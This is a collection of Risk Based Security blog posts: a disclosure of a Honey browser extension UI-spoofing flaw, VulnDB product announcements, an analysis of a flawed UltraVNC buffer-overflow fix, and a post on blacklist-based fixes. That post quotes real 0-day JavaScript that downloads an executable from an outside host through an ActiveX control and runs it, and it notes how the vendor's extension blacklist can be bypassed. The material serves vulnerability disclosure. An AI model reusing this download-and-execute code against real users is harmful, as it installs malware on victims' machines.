Close

RBS Research Team Uncovers Vulnerability in Popular Honey Web Extension

Without the variety of browser extensions available today, the experience of using web browsers would be completely different. They are installed to manage passwords, block advertisements, or integrate functionality of all kinds into the browser.

Most browser extensions sit and wait silently in the background until summoned with a simple click of a button in the browser toolbar. The extensions then usually present a user interface dialog / window to configure or interact with them.

In this regard, the Honey browser extension is no different. The user visits a site and runs the extension to find available coupon codes. According to the vendor, the extension “automatically finds and applies coupon codes at checkout for over 30,000 shopping sites” and has been installed over 10 million times.

However, the extension’s behavior was noticeably different if activated from the browser toolbar. Generally, the UI dialog is positioned slightly over the toolbar, indicating a separate window. In this case, the Honey extension dialog was displayed within the web page area.

Password Checkup extension in comparison to the Honey extension

A quick look using the Google Developer Tools revealed that the Honey UI element was indeed not an overlay on top of the browser window but injected into the web page.

div tag injected to web page by the Honey extension

What does this mean?

This is problematic as the visited web site can now control all injected elements from the Honey extension, i.e. the extension’s user interface; including the login form. With a little bit of JavaScript on a web page that entices a user to use the Honey extension, an attacker can spoof the Honey extension elements and steal user information. As a proof-of-concept, we have developed a web page that displays the user password when entered (in a real-world scenario, the password would be silently saved by the attacker).

Proof-of-concept for stealing passwords

Of course, other attacks may also be possible. In particular, Google and Facebook authentication dialogs could also be replicated to gain access to user passwords for those accounts. However, this attack is mitigated by the fact that pop-up windows present an address bar, thereby disclosing a spoofed domain, which should (hopefully) be detected by the user before entering a password.

Our Research Team reported the vulnerability to the developers at the end of 2018. A fix was released with version 11.3.0 for Chrome on April 16, 2019, version 11.3.5 for Firefox on May 15, 2019. For Windows Edge, version 11.4.2.0 fixes the issue. Currently, no updated version is available for Safari. Users of Safari are urged not to activate and use the extension on untrusted websites.

Research credit goes to Sven Krewitt, Senior Vulnerability Researcher

Video: Improve Your Vulnerability Response Using the New ServiceNow VulnDB Vulnerability Integration

Risk Based Security participated in ITS Partner’s webcast demonstrating the capabilities of the new ServiceNow VulnDB Vulnerability Integration.

Your security solution is only as good as the vulnerability data that drives it. Better data matters because it enables better prioritization decisions and quicker remediation. VulnDB contains comprehensive metadata and research on over 200,000 vulnerabilities, including over 69,000 that aren’t found in the National Vulnerability Database (NVD/CNE), and those numbers are growing quickly, with an  average of about 70 new vulnerabilities disclosed every day.

In this webcast, Jake Kouns, CISO at Risk Based Security, joins Jay Wigard, Product Development Leader from ITS Partners, to discuss the challenges facing security professionals, and the valuable features of the new VulnDB Vulnerability Integration, available now as a free* download from the ServiceNow Store. The setup process is quick and simple. Check out the recorded webcast and start utilizing the ServiceNow platform to leverage asset information within your workflow.

Watch the video above, or download the VulnDB Vulnerability Integration app from the ServiceNow store today.

Interested in learning more about Risk Based Security’s suite of products? Click here to schedule a demo and see how much more comprehensive VulnDB is compared to other security solutions on the market.

* VulnDB subscription required

A Scanning Solution is Only as Good as the Vulnerability Data That Drives it

We had some great conversations at JFrog’s user conference, SwampUp 2019. Brian Martin, our Vice President of Vulnerability Intelligence, took part in an all-star keynote of experts where he discussed how our VulnDB® service helps secure JFrog Xray user pipelines.

The integration of VulnDB allows DevOps teams to discover, receive notifications on, and help remediate vulnerabilities in third-party libraries and dependencies early in the development cycle. As JFrog puts it, “a security scanning solution is only as good as the database of vulnerabilities that drives it.” Driven by Risk Based Security’s comprehensive data, Xray with VulnDB is the best security intelligence solution on the market for developers. 

Why does data from VulnDB give you an edge?

VulnDB is the most comprehensive source of vulnerability data available, with almost 69,000 vulnerabilities that are not found in CVE or the National Vulnerability Database (NVD). As Brian shared in his SwampUP keynote presentation, an average of about 70 new vulnerabilities are disclosed every day. This is an alarming volume, especially if your organization isn’t seeing the complete picture. That’s why our rallying cry is #BetterDataMatters. VulnDB is so much more advanced than any other database because we are looking for vulnerabilities and we speak with the DevOps community to ensure we are monitoring the libraries they are using. VulnDB includes more vulnerabilities, and carries more metadata and research on entries. This allows you to arm your organization with the most complete and up-to-date information available so you can make data-driven decisions to effectively manage and prioritize risk mitigation.

Taking this to mind, let’s look at some real-world applications. Recently, Sophos put out a very thought provoking article. The article made some very interesting points:

  1. Most vulnerabilities aren’t exploited, and if they are, they tend to have a high CVSS score.
  2. There is apparently no relationship between the proof-of-concept (PoC) exploit code being published online and the start of real-world attacks.
  3. In order to patch vulnerabilities, a “reference tagging” machine learning model is the most efficient method.

Sophos based their conclusions on data provided in a whitepaper that researchers from Cyntia, Virginia Tech, and the RAND Corporation published. The findings were extremely engaging, however, the data used to support these claims is lacking…comprehensiveness. 

Looking further into the data provided, it’s apparent that the researchers relied very heavily on security sensors based on CVE IDs, meaning that only vulnerabilities within CVE were being considered. This means that there are almost 69,000 vulns being missed in this study. To make matters worse, security scanning devices tend to cover half of the vulnerabilities in CVE, which makes the subset of data even smaller. 

In addition, Risk Based Security believes the machine learning models used in the study may have mis-categorized focused attacks. In situations where someone determines that a remote target is running specific software, then tries a comprehensive list of attacks against it, a detected attack would likely be labeled incorrectly. Since the researchers were basing their findings off of CVE data, it is highly likely that their sensors were not aware of specific vulnerabilities, resulting in a label of “Generic XSS” for example. This could have skewed results.

Last, these type of reports typically don’t share their full methodology, let alone what they are capable of matching against. This means that there is no way to reproduce or validate their findings. Unfortunately, if the research is solely based on CVE data it means that several vendors performing a similar study will also provide the same rough figures. CVE is the industry “standard,” yet it is missing a huge amount of vulnerabilities, with many of them possessing high CVSS scores and affecting major vendors. As previously stated, “a security scanning solution is only as good as the database of vulnerabilities that drives it.” 

#BetterDataMatters. We would be very interested if the findings presented would be the same if more up-to-date data was used.

Interested in learning more about Risk Based Security’s suite of products? Click here to schedule a demo and see how much more comprehensive VulnDB is compared to other security solutions on the market.

Integrate Better Data from VulnDB into RSA Archer

RSA Archer® is a staple within the risk management community. Recognized as a leader in the 2018 Gartner Magic Quadrant for integrated risk management, RSA Archer allows organizations of all sizes to manage multiple dimensions of risk within its software platform. And now, you can integrate the world-leading vulnerability intelligence from VulnDB® directly into RSA Archer.

Introducing the VulnDB Data Feed for RSA Archer IT Security Vulnerabilities Program. Vulnerability Management is a key component of an integrated risk management strategy. Your organization can now combine the power and flexibility of RSA Archer with the rich vulnerability data of Risk Based Security’s VulnDB service. Some of the many highlights include:

  • Comprehensive and timely vulnerability intelligence. Get access to over 200,000+ vulnerabilities, 68,000 of which are not found in CVE/NVD.
  • Surface potential vulnerabilities by matching asset and software data within RSA Archer to VulnDB’s extensive product associations.
  • Prioritize risk management using VulnDB without needing an additional vulnerability scan.

“The RSA Archer IT Security Vulnerabilities Program is a very powerful tool for surfacing and managing vulnerability-related risks.  With the VulnDB Data Feed, organizations can ensure they are using the best available data to inform that analysis process.” – Eric Paxton, Director of Business Operations, Risk Based Security

With a VulnDB subscription and the VulnDB Data Feed, you can investigate vulnerabilities within your software and make improved and timely risk prioritization and mitigation decisions. New vulnerabilities can be surfaced and remediated without the need to wait for results from another vulnerability scan. As a result, organizations can continuously monitor their environment for new vulnerabilities and potential exploits and greatly reduce their risk window.

Get the VulnDB Data Feed for RSA Archer from the RSA Link portal today*.

* VulnDB subscription required

About VulnDB

VulnDB is the most comprehensive and timely vulnerability intelligence available and provides actionable information about the latest in security vulnerabilities via an easy-to-use SaaS Portal, or a RESTful API for easy integration into GRC tools and ticketing systems. VulnDB allows organizations to search on and be alerted to the latest vulnerabilities, both in end-user software and the third-party libraries or dependencies that help build applications. A subscription to VulnDB provides organizations with simple to understand ratings and metrics on their vendors and products, and how each contributes to the organization’s risk-profile and cost of ownership.

For more information visit vulndb.cyberriskanalytics.com or call 855-RBS-RISK

Already using VulnDB? Risk Based Security has a suite of products that enables organizations make data-driven decisions to effectively manage and prioritize risk mitigation. See how our other products, Cyber Risk Analytics and YourCISO, can help you or your vendors stay secure in this rapidly evolving environment.

Software Vulnerability Management with Device42 and VulnDB

At Risk Based Security, we’ve always believed that one of the critical components of effective security is knowing your vendors and assets, understanding the threats and vulnerabilities that may impact those vendors and assets, and then using that data to prioritize mitigation actions.

That’s why we’re excited to announce the VulnDB® integration into the Device42 platform. With this new integration, Device42 customers can easily map the best-in-class vulnerability information from VulnDB to the asset data discovered by Device42 and view a near-real time list of vulnerable software in their environment. In addition, much of the rich metadata from VulnDB is available directly within Device42 to help organizations understand the most critical vulnerabilities and assets that should receive attention first, yielding a truly risk-based approach.

Experience the power of Device42 + VulnDB for yourself at www.device42.com/integrations/vulndb/

Check your entire IT deployment against VulnDB, automatically

Device42 is a comprehensive, centralized, and cost-effective CMDB solution that auto-discovers and maps your entire IT infrastructure, automatically. Integrate VulnDB to:

  • View a near-real time list of vulnerable software – and where it’s running
    Use Device42 + VulnDB to see an up-to-date list of machines running software instances
    with disclosed vulnerabilities – on demand.
  • Understand vulnerability details
    See software type, license model, vendor, category, license count, and more for each
    software component, and click the ID to see full vulnerability details.
  • API access to vulnerabilities
    Search by software ID and quickly see all disclosed vulnerabilities.
    Experience the power of Device42 + VulnDB™ for yourself at www.device42.com/integrations

Experience the power of Device42 + VulnDB for yourself! Visit https://www.device42.com to learn more about Software Vulnerability Management within Device42 and how it could benefit you.

Contact Device42

Device42, Inc.
600 Saw Mill Road
West Haven, CT 06516

1 (844) 424-2422 | 1 (203) 409-7242

[email protected] 

About VulnDB

VulnDB is the most comprehensive and timely vulnerability intelligence available and provides actionable information about the latest in security vulnerabilities via an easy-to-use SaaS Portal, or a RESTful API for easy integration into GRC tools and ticketing systems. VulnDB allows organizations to search on and be alerted to the latest vulnerabilities, both in end-user software and the third-party libraries or dependencies that help build applications. A subscription to VulnDB provides organizations with simple to understand ratings and metrics on their vendors and products, and how each contributes to the organization’s risk-profile and cost of ownership.

For more information, visit vulndb.cyberriskanalytics.com, call 855-RBS-RISK or contact us here.

Vulnerabilities disclosed during the first three months of 2019 reach a Q1 all-time high

RICHMOND, VA, May 16, 2019 — Risk Based Security today released the Q1 2019 Vulnerability QuickView Report.

There were 5,501 vulnerabilities aggregated by Risk Based Security’s VulnDB that were disclosed during the first three months of 2019. This represents a 1% increase over the same period in 2018, making this Q1 an all-time high.

CVSSv2 scores of 9.0+, deemed critical issues, accounted for 14.0% of all published Q1 2019 vulnerabilities.

Risk Based Security’s VulnDB published 2,539 (85%) more vulnerabilities than CVE/NVD in the first quarter. 45.8% of the vulnerabilities not published by NVD/CVE have a CVSS score of either 7.0 – 8.99 (high) or 9.0 – 10.0 (critical).

“This continues to illustrate the need for a comprehensive vulnerability intelligence feed and a mature process that can quickly determine the true risk and lead the organization to address issues in a risk-based methodology,” commented Brian Martin, VP of Vulnerability Intelligence at Risk Based Security.

Just over half of all reported vulnerabilities in Q1 2019 have a remote attack vector followed by almost a third having a user-assisted or context-dependent attack vector. Unlike previous quarters, over 13% of the reported vulnerabilities require local access to a system or device. While many are quick to dismiss local attacks as less risky, the increasing use of virtual technology and mobile devices may give an attacker a foothold on a device making local privilege escalation attacks more worrisome.

“The year-after-year increase in vulnerabilities being disclosed is clear, but there is no better example of the growing threats than this: in the last 24 hours, while finishing the Q1 2019 report, we pushed 241 new vulnerabilities to VulnDB,” commented Martin. “That should be an eye-opener and a serious concern to any organization, regardless of size or industry.”

Get your copy of the Q1 2019 Vulnerability QuickView Report

About the Vulnerability QuickView Report

The VulnDB QuickView report is possible through the research conducted by Risk Based Security. It is designed to provide an executive level summary of the key findings from RBS’ aggregation of vulnerabilities disclosed in Q1 2019. Contact Risk Based Security for a specific analysis of the vulnerabilities of critical relevance to your organization.

Risk Based Security Announces New Integration with Recorded Future for Intelligence-Driven Vulnerability Management

Risk Based Security, Inc., a provider of detailed information and analysis on Vulnerability Intelligence, Data Breaches, and Vendor Risk Ratings, today announced a new partnership with Recorded Future, the leading threat intelligence company, to help joint customers more effectively identify and prioritize the vulnerabilities they should mitigate.

Recorded Future and VulnDB logos

Risk Based Security’s VulnDB is the most comprehensive and timely vulnerability intelligence solution available.  It provides actionable information about the latest in security vulnerabilities, both in end-user software and the third-party libraries or dependencies that help build applications.  It enables security professionals to quickly and thoroughly analyze and respond to possible threats to their organization, helping safeguard them against the considerable costs and damage, to both data and reputation, that may result from an unmanaged vulnerability. The integration of the best-in-class vulnerability data from VulnDB into the Recorded Future analysis platform enables security teams to not only prioritize the vulnerabilities needing mitigation more effectively but also enrich and enhance their ability to respond to indicators of compromise.

The Recorded Future Connect partner program is laser focused on providing intelligence that helps teams make faster, more confident decisions by integrating rich threat intelligence into all security processes. Today, partners represent leading SIEM, incident response, ticketing, link analysis, security infrastructure, security orchestration and automation, vulnerability management, and threat intelligence platform (TIP) solutions.

“In 2018 alone, more than 22,000 vulnerabilities were added to the VulnDB database – more than any security team could manually identify and analyze on their own, never mind the actual patching and mitigation when a company is at risk. We’re proud to partner with Risk Based Security and believe the goal they’re working toward is foundational to cybersecurity teams’ ability to protect their organizations.” – Glenn Wong, Director of Product Management and Technology Partnerships, Recorded Future

VulnDB contains over 67,000 additional vulnerabilities not found in the frequently relied-upon Common Vulnerabilities and Exposures (CVE) database, and a much higher degree of information for each vulnerability, providing the richest, most complete vulnerability intelligence available.  VulnDB helps customers better address points of risk across their organization – from application development and IT infrastructure management to security operations, vendor risk management, and procurement.

“Better data matters when it comes to effectively prioritizing and remediating vulnerabilities,” said Jake Kouns, Chief Information Security Officer at Risk Based Security. “With the VulnDB Intelligence Card extension for Recorded Future, our joint customers can access VulnDB’s extensive vulnerability intelligence from within the Recorded Future platform to provide additional valuable context and better respond to growing threats.”

About Risk Based Security

Risk Based Security (RBS) provides detailed information and analysis on Data Breaches, Vendor Risk Ratings and Vulnerability Intelligence. Our products, Cyber Risk Analytics (CRA) and VulnDB, provide organizations access to the most comprehensive threat intelligence knowledge bases available, including advanced search capabilities, access to raw data via API, and email alerting to assist organizations in taking the right actions in a timely manner. In addition, our YourCISO offering provides organizations with on-demand access to high quality security and information risk management resources in one, easy to use web portal.

VulnDB is the most comprehensive and timely vulnerability intelligence available and provides actionable information about the latest in security vulnerabilities via an easy-to-use SaaS Portal, or a RESTful API for easy integration into GRC tools and ticketing systems. VulnDB allows organizations to search on and be alerted to the latest vulnerabilities, both in end-user software and the third-party libraries or dependencies that help build applications. A subscription to VulnDB provides organizations with simple to understand ratings and metrics on their vendors and products, and how each contributes to the organization’s risk-profile and cost of ownership.

For more information, please visit www.riskbasedsecurity.com or vulndb.cyberriskanalytics.com, call 855-RBS-RISK or contact us here.

About Recorded Future

Recorded Future delivers the only complete threat intelligence solution powered by patented machine learning to lower risk. We empower organizations to reveal unknown threats before they impact business, and enable teams to respond to alerts 10 times faster. To supercharge the efforts of security teams, our technology automatically collects and analyzes intelligence from technical, open web, and dark web sources and aggregates customer-proprietary data. Recorded Future delivers more context than threat feeds, updates in real time so intelligence stays relevant, and centralizes information ready for human analysis, collaboration, and integration with security technologies. 91 percent of the Fortune 100 use Recorded Future. Learn more at www.recordedfuture.com and follow us on Twitter at @RecordedFuture.

Request a demo of Recorded Future: https://go.recordedfuture.com/demo

Vulnerability Fixes That Make You Go Hmm…

The VulnDB research team processes a large number of vulnerability reports, exploits, and vendor advisories on a daily basis. Each report is scrutinized, classified and added to the VulnDB vulnerability database. They are enriched with important details like affected versions, requirements for exploitation, and sometimes even identifying incorrect fixes.

The lack of available detail in public reports and disclosures often requires us to dig deeper to create the meaningful intelligence VulnDB is famous for. In some cases, our investigations lead our research team to suspect that something doesn’t quite add up.

Early March 2019, Kaspersky Labs published information about a stack-based buffer overflow that caught our attention. While these conditions have the potential to allow code execution, the advisory only states denial of service (DoS) as the potential impact. Exploitation also requires user interaction. This was something worth investigating further. The assessment of the affected versions (“UltraVNC before 1.2.2.3”) and the fix (revision 1206) also raised some questions, but first, let’s evaluate the vulnerability itself.

Looking at the fixing changeset, the affected function ClientConnection:: ShowConnInfo() was changed to address the reported stack-based buffer overflow. This appeared to be triggerable by a specially crafted VNC server, when displaying connection information.

screenshot of code including the snprintf function

So far, so good. A sprintf() type function is replaced by _snprintf() with a buffer length limitation. However, looking at a larger part of the function context raised some eyebrows.

screenshot of code limiting the size when invoking _snprintf to 20148

The savvy developer may have already spotted the issue here. The destination buffer is only 2048 bytes is size. Limiting the size when invoking _snprintf() to 20148 does not prevent the buffer overflow, so this apparent typo leaves the application prone to the vulnerability. We downloaded version 1.2.2.3, as “UltraVNC before 1.2.2.3” were reported vulnerable. That’s when we noticed that 1.2.2.3 was released November 11, 2018, about two months before the fix in the repository.

things that make you go hmmm - Fry

At this point we have:

  • A stack-based buffer overflow, reported as DoS only
  • A typo in the fix, which looks insufficient
  • Ambiguous version information

When it comes to creating VulnDB entries, we are sometimes driven by what we call VulnDB OCD. We decided to keep digging and figure out what was really going on.

To trigger the vulnerability, we need to create a VNC server and control one of the parameters used in the _snprintf()call. This could be done via the name associated with the desktop in a ServerInit message (see RFC 6143 – The Remote Framebuffer Protocol). We implemented a Proof-of-Concept using libvncserver and changing the response in the rfbProcessClientInitMessage() function in rfbserver.c.

screenshot of vncviewer.exe - pointer to next seh record

When connecting to our VNC server using the vncviewer.exe, the stack-based buffer overflow could be triggered when the user displays the connection information (e.g. via the title context-menu). While this allowed to overflow a wide range of stack memory, exploitation of this vulnerability is mitigated by modern security features such as DEP, SafeSEH, or SEHOP. This is probably the reason why this is initially classified as a denial of service issue. However, at this point, a bypass of these features can’t be ruled out. In particular, ASLR (Address Space Layout Randomization) is not enabled in the application, which aids when using return-oriented programming (ROP) techniques to bypass e.g. DEP.

(As a side-note: a crash in a client application requiring user interaction, e.g. connecting to a specially crafted VNC server, would not be classified as a vulnerability, but rather a stability issue).

On March 14, 2019, a new version (1.2.2.4) was released, which included the insufficient fix. We tested this version against our VNC server and, not surprisingly, could still reproduce the stack-based buffer overflow. We then contacted the vendor to inform them the incomplete fix and quickly received a response that the issue was corrected with revision 1216 with the vendor silently updating 1.2.2.4 as of March 19, 2019.

The result of our brief excursion:

  • The denial of service non-issue turned out to be potentially exploitable for arbitrary code execution.
  • Version 1.2.2.3 was vulnerable, even though the advisory suggested otherwise.
  • Early downloads of 1.2.2.4 were affected due to a typo in the initial fix.
  • Only version 1.2.2.4 downloaded after March 19, 2019 addresses the vulnerability with a silent fix.

Hmmm indeed.

Learn more about how VulnDB and our research team can equip your security team with better data.

Blacklisting Limitations: Poor Cisco Fixes and Korean 0-days

Using blacklisting to fix vulnerabilities is rarely the right approach. That should not come as a surprise to anyone, and we all know variants of the saying: “The developer has to determine all cases of bad input; the attacker just has to determine the one that was missed.” Yet this does not stop vendors from still resorting to basic blacklisting approaches to “fix” vulnerabilities in their products.

In January 2019, Cisco addressed a vulnerability in their RV320 and RV325 VPN routers that allowed unauthenticated, remote attackers to disclose sensitive diagnostics information. This was possible by accessing the /cgi-bin/export_debug_msg.exp CGI program in the web-based management interface. The proper fix would be to ensure that only authenticated, privileged users can access the CGI program. Cisco decided on a different approach…

Last week, researchers disclosed that Cisco simply restricted access to the CGI program if requests come from curl HTTP user agents. The reason is likely that the PoC provided to Cisco by the researcher was using curl. Naturally, this “fix” is trivial to bypass by simply changing the HTTP user agent being sent as part of the request. Cisco has acknowledged that the original fix is incomplete and that they’re working on a new one.

Cisco are not the only ones to make mistakes like these. We recently completed a research project for some of our major Korean customers (more on that in a later post). As part of the project we reviewed the July 2014 version of a monthly report about malicious code trends published by KISA (Korea Internet & Security Agency). On pages 29 and 30 of the report, it shows a JavaScript file with malicious code that exploited a 0-day vulnerability in the HandySoft HShell ActiveX control by combining three unsafe methods.

A snippet of the relevant code:

obj.DownloadFromURL("http://www.sdgfaith.com/files/env/image/jpg/last.gif", "c:\\windows\\temp\\SearchMon.exe", 1, 1);
setTimeout(function() {
   if(obj.IsFileExist("c:\\windows\\temp\\SearchMon.exe"))
      obj.ShellExec("", "c:\\windows\\temp\\SearchMon.exe", "", "c:\\", 0, 0, 0);
}, 20000);

The methods in question are: DownloadFromURL(), IsFileExist(), and ShellExec(). Three method names that one generally does not want to see in safe-for-scripting ActiveX controls, as it is not functionality that websites should have access to.

At some point, the vendor attempted to fix these vulnerabilities. Instead of questioning whether these were sensible functions to have in a safe-for-scripting ActiveX control, the vendor instead opted – similar to Cisco – for a blacklisting approach. A validation function was introduced that restricts the file extensions that are accepted by the DownloadFromURL() and ShellExec() methods. However, the list is hardly exhaustive when it comes to dangerous file types, as it only covers: “.exe”, “.com”, “.bat”, “.cmd”, “.scr”, “.msi”, and “.vbs”. While it successfully blocked the 0-day exploit, there are many obvious dangerous file types not covered by this list. This makes it trivial to tweak the original exploit to bypass the check and still download and execute malicious code on a user’s system when visiting a web page.

Full details on the vulnerability are available in our research report.

In general, if a vendor’s immediate idea for fixing a vulnerability is to introduce a blacklist, they should pause and reconsider. What is the vulnerability’s root cause? In most cases, there is a much better way to solve it. If restrictions still seem like the right approach, the default should be a very limited whitelist. If a vendor can’t think of a good whitelist, they probably can’t come up with a good blacklist. In such cases, it’s very likely that the design of the functionality is just insecure.

200,000th Vulnerability Added To VulnDB (And Why You Should Care)

RICHMOND, VA, March 29, 2019 — Risk Based Security today announced the addition of the 200,000th vulnerability to VulnDB, the preeminent database of vulnerability intelligence. This significant record highlights the scale of the security challenges faced by organizations, and the sheer volume of data that they need to be able to process.

“With over 4,800 new vulnerabilities already disclosed in 2019, we are seeing an early indication that the security problems organizations have been facing aren’t going away this year, or anytime soon,” commented Jake Kouns, CISO for Risk Based Security.

The 200,000th addition is a reflected cross-site scripting (XSS) vulnerability [VulnDB ID 201564] in the popular Malware Information Sharing Platform (MISP). This milestone reflects the steady and ongoing disclosure of vulnerabilities in every type of software, even that which is designed to help achieve security.

The recently published 2018 Year End Vulnerability QuickView Report found that there were more than 22,000 new vulnerabilities disclosed in 2018. Risk Based Security’s VulnDB research team works hard to ensure that they track any vulnerability, but most important are the issues that could impact their customers. Their focus on having the broadest and most detailed intelligence possible has pushed VulnDB to have catalogued 33% more disclosed vulnerabilities than are tracked by the industry-standard public sources, Common Vulnerabilities and Exposures (CVE) or the National Vulnerability Database (NVD). VulnDB is able to provide organizations with the intelligence they need to make more informed risk decisions based on over 66,000 additional vulnerabilities only captured in VulnDB.

The wider implication is clear: without better data, organizations cannot accurately prioritize critical issues. Risk Based Security’s mission is to ensure their clients have access to the data they require. “To understand what motivates us, look no further than our company name,” commented Jake Kouns. “We provide a platform and superior intelligence so our clients can make Risk Based Security decisions on how to better handle vulnerabilities and understand the vendor and products they rely on.”

“As the tools that help researchers find vulnerabilities improve, and as that pool of researchers grows, the rate of disclosures will continue to rise. Organizations will be forced to dedicate more time and resources to keep up with the risks posed,” said Brian Martin, VP of Vulnerability Intelligence at Risk Based Security.

VulnDB is the most complete and timely vulnerability intelligence available

About VulnDB

VulnDB is the most comprehensive and timely vulnerability intelligence available and provides actionable information about the latest in security vulnerabilities via an easy-to-use SaaS Portal, or a RESTful API that allows easy integration into GRC tools and ticketing systems.

VulnDB allows organizations to search and be alerted on the latest vulnerabilities, both in end-user software and 3rd-party libraries or dependencies. It features simple to understand ratings and metrics on their vendors and products, and how each contributes to the organization’s risk-profile and cost of ownership.

VulnDB, by the numbers:

  • 200,000 vulnerabilities all time and growing
  • Over 4,900 vulnerabilities YTD 2019
  • Over 66,000 vulnerabilities missing from CVE
  • Over 22,000 vendors included

Learn more about VulnDB or request a demo.

About Risk Based Security

Risk Based Security (RBS) provides detailed information and analysis on Data Breaches, Vendor Risk Ratings and Vulnerability Intelligence. Their products, Cyber Risk Analytics (CRA) and VulnDB, provide organizations access to the most comprehensive threat intelligence knowledge bases available, including advanced search capabilities, access to raw data via API, and email alerting to assist organizations in taking the right actions in a timely manner. In addition, the YourCISO offering provides organizations with on-demand access to high quality security and information risk management resources in one, easy to use web portal.